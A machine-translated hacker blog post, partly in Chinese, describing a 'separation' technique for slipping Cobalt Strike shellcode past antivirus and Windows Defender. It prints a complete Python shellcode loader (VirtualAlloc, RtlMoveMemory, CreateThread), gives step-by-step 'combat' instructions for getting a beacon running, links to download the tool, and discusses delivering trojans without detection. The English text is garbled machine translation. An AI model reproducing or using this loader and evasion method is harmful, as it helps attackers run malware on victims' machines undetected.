0x001 principle
Using the separation method, i.e. ShellCode loading and separation. Method is more LOW but avoid killing.
This paper will turn into ShellCode HEX, then ShellCode performed by the loader.
PS: What is SC loader for loading ShellCode i.e. dedicated tools provided.
Like HTTP contracting tools, support submit HTTP, hardcoded parameters can only be called EXP.
Further detail, an analogy, you will fry a dish, you say you cook it?
0x002 ShellCode free to kill
CS ShellCode can generate a variety of formats, specifically the use which is it?
As part of the soft kill killing will ShellCode file, so you can not directly use RAW.
In fact, do not measure all know HEX string certainly safer than the standard C or RAW format.
Because RAW and standard C format has always been more popular, it is not surprising killed.
Of course, any format can actually use, provided that the required encryption and decryption.
Let's take ShellCode CS3.13 to make a comparison with the following results
CS ShellCode generating Raw format is seven soft kill killing (payload.bin)
http://r.virscan.org/language/zh-cn/report/a24430ec84bdb3dd3ee0b7a1aa501635
transfected into the CS of ShellCode Hex without killing a soft kill (hex.txt)
http://r.virscan.org/language/zh-cn/report/fe7412921c7acc9d69b0da72793cd57d
0x003 loader
With python, for example, the non-brain language development faster. To use a different encryption algorithm is also very simple
Only drawback is a little big file, but not a big problem, after all, free to kill in front of 2M is acceptable ha ha.
Other languages also empathy ah, we should not tangle what language to write tools. Just facilitate better understanding with PY
scrun.py Code:
#scrun by k8gege
import ctypes
import sys
#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE81485213884926AA0AEFD4AD1631EB69808D54C1BD927AC2A25EB9383A8F5D42353802E50EE93F42B3411E98BBF81C92A13579920D813C524DFF07D5054F751D12EDC75BAF57D2F665B812FCE04273BFC5151666AA7D31CD3A7EB1E73C0DA951C97E27F5967A922CBE074B74E6D876D8C8804846C6F14ED692B921D03247722B045524157D63EA8F25EA4B4"
shellcode=bytearray(sys.argv[1].decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
I used to write the loader below, GUI dedicated to local testing ShellCode normal use, test the vulnerability of the time,
First, ensure that your first ShellCode is running, or else no problem loophole, horse not on the line, you would not say loopholes in the chaos to come.
In addition to the PY and C #, VC, Delphi, VB has written a load of SC, Delphi version will be able to find examples in the blog.
0x004 combat
1. First use CS generates standard C format payload, format (\ xfc \ xe8 \ x89 \ x00) in the knife where I defined as Char format
2. Because there is no direct generation CS HEX format, it is necessary to use the knife to convert it to K8 HEX format.
Specific steps: Select Char format Shellcode, right -Hacking - ShellCode - Char2Hex
Other formats ShellCode overflow use, the knife can be used or converted into a standard format inversion
3. Use ShellCode scrun.exe load Hex format found on our line of CS.
If I remember correctly this way is also still too Win10 system comes Defender
I wonder if we have not found Hex string in addition to not be killed, but also not have to land
The Bin files need to be ground and kill Defender (which I certainly did not remember correctly)
0x005 Download
https://github.com/k8gege/scrun
https://github.com/k8gege/K8tools/blob/master/scrun.exe
https://github.com/k8gege/K8tools/blob/master/scrun.py
PS: Some online articles to load aspx shellcode called the separation Payload, only EXE called Payload?
So why when the SQL injection SQL statement called Payload? Why remote code execution of code called Payload?
Why overflow vulnerability ShellCode called Payload? ShellCode-coded into the loader is obviously not called in the separation.
At this point the loader has not called a loader, as HTTP contracting tools, support any HTTP contract.
But to write HTTP parameters contracting dead, why just called XX using a tool, rather than contracting tool called.
Similarly, ShellCode loader designed to load all kinds of ShellCode called loader.
其实以前也写过VC版的加载器,只是方法较LOW,需要多一个文件或传参执行不适合发马
发马又得想方设法将其捆绑成一个文件,捆绑可能还会被杀,VC被杀得比较历害。
ShellCode加密分离后,因为最终执行需解必,拼按时就被杀了,都还没得加载。
所以从未打算使用这种LOW方法免杀,一般是没能力做单文件免杀才需要分离。
而不是现在一些人认为所谓高级新的免杀方法,这种小儿科,在刚接触这行时就会了
看看07-12年那会,捆绑还多么流行,木马切割成多文件合并免杀的思路会没人想到?
现在是因为捆绑可能导致更容易被杀,没办法才被迫使用分离,毕竟能一文件谁愿多文件
当然单文件我也可以做,只是费点时间,懒得做而已。相关APT文章里就很多方法
基本都是白名单加载DLL,DLL释放各种加密文件,再解密执行,最终加载CS而已。